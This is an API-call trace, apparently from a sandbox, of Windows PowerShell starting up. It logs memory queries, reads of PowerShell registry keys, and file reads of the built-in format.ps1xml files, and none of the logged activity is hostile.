	[0278.179] VirtualQuery (in: lpAddress=0x26c060, lpBuffer=0x26cf20, dwLength=0x30 | out: lpBuffer=0x26cf20*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.179] VirtualQuery (in: lpAddress=0x26c060, lpBuffer=0x26cf20, dwLength=0x30 | out: lpBuffer=0x26cf20*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.179] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.180] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.747] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.748] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.750] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0279.044] CoTaskMemAlloc (cb=0x104) returned 0x518270
	[0279.044] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0279.044] CoTaskMemFree (pv=0x518270) 
	[0279.048] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0279.052] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0279.053] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0279.053] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0279.053] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0279.053] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0279.053] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0279.054] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0279.055] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0279.056] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d508 | out: phkResult=0x26d508*=0x32c) returned 0x0
	[0279.056] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x26d51c, lpData=0x0, lpcbData=0x26d518*=0x0 | out: lpType=0x26d51c*=0x1, lpData=0x0, lpcbData=0x26d518*=0x74) returned 0x0
	[0279.056] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x26d48c, lpData=0x0, lpcbData=0x26d488*=0x0 | out: lpType=0x26d48c*=0x1, lpData=0x0, lpcbData=0x26d488*=0x74) returned 0x0
	[0279.056] CoTaskMemAlloc (cb=0x78) returned 0x4c2350
	[0279.056] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x26d45c, lpData=0x4c2350, lpcbData=0x26d458*=0x74 | out: lpType=0x26d45c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x26d458*=0x74) returned 0x0
	[0279.056] CoTaskMemFree (pv=0x4c2350) 
	[0279.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x26d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0279.057] SetErrorMode (uMode=0x1) returned 0x1
	[0279.057] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x26d3e0 | out: lpFileInformation=0x26d3e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0279.057] SetErrorMode (uMode=0x1) returned 0x1
	[0279.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0279.057] SetErrorMode (uMode=0x1) returned 0x1
	[0279.058] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d3e0 | out: lpFileInformation=0x26d3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0279.058] SetErrorMode (uMode=0x1) returned 0x1
	[0279.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0279.058] SetErrorMode (uMode=0x1) returned 0x1
	[0279.058] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d3e0 | out: lpFileInformation=0x26d3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0279.058] SetErrorMode (uMode=0x1) returned 0x1
	[0279.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0279.058] SetErrorMode (uMode=0x1) returned 0x1
	[0279.058] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d3e0 | out: lpFileInformation=0x26d3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0279.058] SetErrorMode (uMode=0x1) returned 0x1
	[0279.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0279.059] SetErrorMode (uMode=0x1) returned 0x1
	[0279.059] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d3e0 | out: lpFileInformation=0x26d3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0279.059] SetErrorMode (uMode=0x1) returned 0x1
	[0279.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0279.059] SetErrorMode (uMode=0x1) returned 0x1
	[0279.059] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d3e0 | out: lpFileInformation=0x26d3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0279.059] SetErrorMode (uMode=0x1) returned 0x1
	[0279.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0279.059] SetErrorMode (uMode=0x1) returned 0x1
	[0279.060] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d3e0 | out: lpFileInformation=0x26d3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0279.060] SetErrorMode (uMode=0x1) returned 0x1
	[0279.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0279.060] SetErrorMode (uMode=0x1) returned 0x1
	[0279.060] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d3e0 | out: lpFileInformation=0x26d3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0279.060] SetErrorMode (uMode=0x1) returned 0x1
	[0279.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0279.060] SetErrorMode (uMode=0x1) returned 0x1
	[0279.060] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d3e0 | out: lpFileInformation=0x26d3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0279.060] SetErrorMode (uMode=0x1) returned 0x1
	[0279.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0279.061] SetErrorMode (uMode=0x1) returned 0x1
	[0279.061] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d3e0 | out: lpFileInformation=0x26d3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0279.061] SetErrorMode (uMode=0x1) returned 0x1
	[0279.061] CoTaskMemAlloc (cb=0x104) returned 0x518270
	[0279.061] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0279.061] CoTaskMemFree (pv=0x518270) 
	[0279.063] CoTaskMemAlloc (cb=0x104) returned 0x518270
	[0279.063] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0279.063] CoTaskMemFree (pv=0x518270) 
	[0279.064] CoTaskMemAlloc (cb=0x104) returned 0x518270
	[0279.064] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0279.064] CoTaskMemFree (pv=0x518270) 
	[0279.064] CoTaskMemAlloc (cb=0x104) returned 0x518270
	[0279.064] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0279.064] CoTaskMemFree (pv=0x518270) 
	[0279.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26caf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0279.065] SetErrorMode (uMode=0x1) returned 0x1
	[0279.065] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328
	[0279.065] GetFileType (hFile=0x328) returned 0x1
	[0279.065] SetErrorMode (uMode=0x1) returned 0x1
	[0279.065] GetFileType (hFile=0x328) returned 0x1
	[0279.065] ReadFile (in: hFile=0x328, lpBuffer=0x33fd278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x33fd278*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0279.067] ReadFile (in: hFile=0x328, lpBuffer=0x33fd278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x33fd278*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0279.067] ReadFile (in: hFile=0x328, lpBuffer=0x33fd278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x33fd278*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0279.067] ReadFile (in: hFile=0x328, lpBuffer=0x33fd278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x33fd278*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0279.068] ReadFile (in: hFile=0x328, lpBuffer=0x33fd278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x33fd278*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0279.068] ReadFile (in: hFile=0x328, lpBuffer=0x33fd278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x33fd278*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0279.068] ReadFile (in: hFile=0x328, lpBuffer=0x33fd278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x33fd278*, lpNumberOfBytesRead=0x26d078*=0x9e2, lpOverlapped=0x0) returned 1
	[0279.068] ReadFile (in: hFile=0x328, lpBuffer=0x33fc7c2, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x33fc7c2*, lpNumberOfBytesRead=0x26d078*=0x0, lpOverlapped=0x0) returned 1
	[0279.068] ReadFile (in: hFile=0x328, lpBuffer=0x33fd278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x33fd278*, lpNumberOfBytesRead=0x26d078*=0x0, lpOverlapped=0x0) returned 1
	[0279.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0279.069] SetErrorMode (uMode=0x1) returned 0x1
	[0279.069] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d020 | out: lpFileInformation=0x26d020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0279.069] SetErrorMode (uMode=0x1) returned 0x1
	[0279.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0279.069] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d108 | out: phkResult=0x26d108*=0x328) returned 0x0
	[0279.069] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d08c, lpData=0x0, lpcbData=0x26d088*=0x0 | out: lpType=0x26d08c*=0x1, lpData=0x0, lpcbData=0x26d088*=0x56) returned 0x0
	[0279.069] CoTaskMemAlloc (cb=0x5a) returned 0x1b89b410
	[0279.069] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d05c, lpData=0x1b89b410, lpcbData=0x26d058*=0x56 | out: lpType=0x26d05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d058*=0x56) returned 0x0
	[0279.069] CoTaskMemFree (pv=0x1b89b410) 
	[0279.069] RegCloseKey (hKey=0x328) returned 0x0
	[0279.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0279.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0279.076] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xa5a3d0f5, Data2=0xaa96, Data3=0x4392, Data4=([0]=0x8b, [1]=0x7a, [2]=0xf4, [3]=0x3e, [4]=0x49, [5]=0xac, [6]=0xdf, [7]=0x5b))) returned 0x0
	[0279.084] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x37077108, Data2=0x50a2, Data3=0x4ec9, Data4=([0]=0x80, [1]=0x56, [2]=0x20, [3]=0x6f, [4]=0x95, [5]=0xc8, [6]=0xed, [7]=0xe2))) returned 0x0
	[0279.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26caf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0279.086] SetErrorMode (uMode=0x1) returned 0x1
	[0279.086] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328
	[0279.086] GetFileType (hFile=0x328) returned 0x1
	[0279.087] SetErrorMode (uMode=0x1) returned 0x1
	[0279.087] GetFileType (hFile=0x328) returned 0x1
	[0279.087] ReadFile (in: hFile=0x328, lpBuffer=0x3427de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3427de0*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0279.821] ReadFile (in: hFile=0x328, lpBuffer=0x3427de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3427de0*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0279.821] ReadFile (in: hFile=0x328, lpBuffer=0x3427de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3427de0*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
